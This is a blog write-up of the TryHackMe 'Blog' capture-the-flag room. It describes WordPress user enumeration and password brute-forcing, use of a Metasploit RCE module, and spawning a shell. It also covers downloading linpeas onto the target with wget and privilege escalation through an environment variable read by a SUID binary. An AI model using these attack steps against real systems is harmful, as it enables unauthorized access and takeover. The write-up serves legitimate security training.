Hello Guys!
In this Post we will discuss the Blog CTF on TryHackMe.
At this point its a new Room (5 Days old).
In order to get the blog to work with AWS, you’ll need to add blog.thm
to your /etc/hosts file.
URL: Blog
Difficulty: Medium
Author: Nameless0ne
As always, I started by Enumerating the System.
Nmap gor me the following Results:
Afterwards I ran enum4linux and Gobuster with the popular common.txt Wordlist.
In the Actual Site, we can also see two Names which we could use to Bruteforce a Password:
I used all Usernames I got up until that point, and made a custom Username-List. I simply changed the formats
from Names to usernames, for example:
bob johnson -> bob.johnson -> johnson.bob -> bob-johnson -> bob-johnson123 ...
Thats what you could do on another Site. Since we got a Wordpress Site, we can use a Tool called wpsscan to
Enumerate Users and Dictionary Attack their Password with rockyou.txt.
[i] User(s) Identified:
[+] kwheel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] bjoel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
As I said before, from here you can use the Tool with the two found Usernames to Dicitonary attack the
two Users.
After getting the Password for one of the Users, you will get Access to the Panel. You have no rights
to actually Post anything. We need to PrivEsc.
Since this is a outdated WordPress Version, I found a Exploit for it.
It has its own Metasploit Module in exploit/multi/http/wp_crop_rce. As the Name says, its a RCE Exploit.
As we can see, we gained a Meterpreter Session. We are currently www-data. We have to PrivEsc again.
I opened a Shell to navigate faster. I had to spawn the Bash Shell with the following Command:
python -c 'import pty; pty.spawn("/bin/bash")'
The actual User Flag in /home/bjoe1 turns out to be a Fake User Flag.
In order to PrivEsc the right way, I uploaded linpeas onto the System. I created a Python Web Server
on my local Machine with the Command python3 -m http.server [PORT]. The Webserver needs to be initialized
in the Folder, the File(s) you want to Download are stored. Afterwards I ran the Command
wget http://{IP}:{PORT}/linpeas.sh to Download the File. Make sure to be in a Direvtory where you are
able to Execute, /tmp is always a good one. Dont forget to give the File execute Perms.
Linpease gave us the following SUID PriEsc Methods:
I additionally ran the following Command:
find -perm -400 -ls 2>/dev/null
So as we can see, there is a weird “checker” Programm. After some basic Reverse Engeneering, I saw that I could
get Admin (UID 0) by setting up a new enviroment Variable.
Ebviroment Variables are Variable which can be used everywhere, they simply store a string. The Program requires you
to have such a Variable “admin”.
To create a new one you will have to aplly the following Command:
export admin=admin
Afterwards you will be able to run the Script again and gain Root.
Credits go out to Power. He is part of the BayByte Team and helped
me out with the PrivEsc!